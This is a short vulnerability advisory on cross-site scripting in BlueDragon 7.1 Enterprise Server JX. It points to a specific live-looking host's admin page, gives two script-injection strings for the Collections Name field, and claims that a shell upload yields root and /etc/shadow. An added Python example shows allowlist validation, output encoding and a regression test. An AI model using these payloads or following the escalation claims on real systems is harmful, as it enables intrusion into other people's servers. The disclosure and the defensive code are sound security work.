BlueDragon version 7.1 Enterprise Server JX suffers from multiple cross-site scripting vulnerabilities.
8c44b9e31da6fd5f9ec46ce6a6b3c81eeabfc2c04c3437b2c607e358e152d175
# Exploit Title: BlueDragon 7.1 Enterprise Server JX Multiple XSS Vulnerabilities
# Google Dork:
# Cost : 5999$
# Date: 01/08/2011
# Author: www.newatlanta.com/bluedragon/
# Software Link: www.newatlanta.com/bluedragon/
# Version: 7.1
# Tested on: Windows 7, Ubuntu 11
# CVE :
# Exploit Discovered : SubhashDasyam
# Website : http://www.subhashdasyam.com
http://scotspine.viviotech.net:8080/bluedragon/admin/collections.cfm
In the Name field of Collections, enter an XSS string such as:
<BODY ONLOAD=alert('XSS')>
"><< <script>alert('XSS');</script>">
Demo screenshot:
http://i54.tinypic.com/k2ec05.png
This Enterprise Server costs 5999$ per license, yet there is no security.
You get root access to the server if you upload a shell.
One can access the shadow file (/etc/shadow), etc.
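
The fix for the Name field of Collections described above is an input allowlist plus output encoding. The following is an added example, not code from the advisory or from New Atlanta; it uses Python only to illustrate (BlueDragon pages are CFML), and the name pattern, the row markup and all function names are assumptions. It parses the rendered row to confirm that the two strings from the advisory produce no new tags or attributes once encoded.

```python
import html
import re
from html.parser import HTMLParser

# The two test strings quoted in the advisory.
ADVISORY_STRINGS = [
    "<BODY ONLOAD=alert('XSS')>",
    "\"><< <script>alert('XSS');</script>\">",
]

# Assumed policy: a collection name is a short plain identifier.
NAME_RE = re.compile(r"[A-Za-z0-9_ -]{1,64}")

def is_valid_name(name):
    """Input check: accept only names that match the allowlist."""
    return NAME_RE.fullmatch(name) is not None

def render_row(name, encode=True):
    """Echo the name in a quoted attribute and in element text.
    encode=False reproduces the unencoded echo, for comparison only."""
    shown = html.escape(name, quote=True) if encode else name
    return ('<tr><td><input name="collection" value="%s"></td>'
            '<td>%s</td></tr>' % (shown, shown))

class _Collector(HTMLParser):
    """Records every start tag and attribute name the parser sees."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = set(), set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)
        self.attrs.update(key for key, _ in attrs)

def markup_seen(fragment):
    """Return (tags, attribute names) present in an HTML fragment."""
    parser = _Collector()
    parser.feed(fragment)
    parser.close()
    return sorted(parser.tags), sorted(parser.attrs)

if __name__ == "__main__":
    for s in ADVISORY_STRINGS:
        print(is_valid_name(s), markup_seen(render_row(s)),
              markup_seen(render_row(s, encode=False)))
```

The markup_seen check works as a regression test: any tag or attribute beyond the template's own (tr, td, input, name, value) means the value was echoed without encoding.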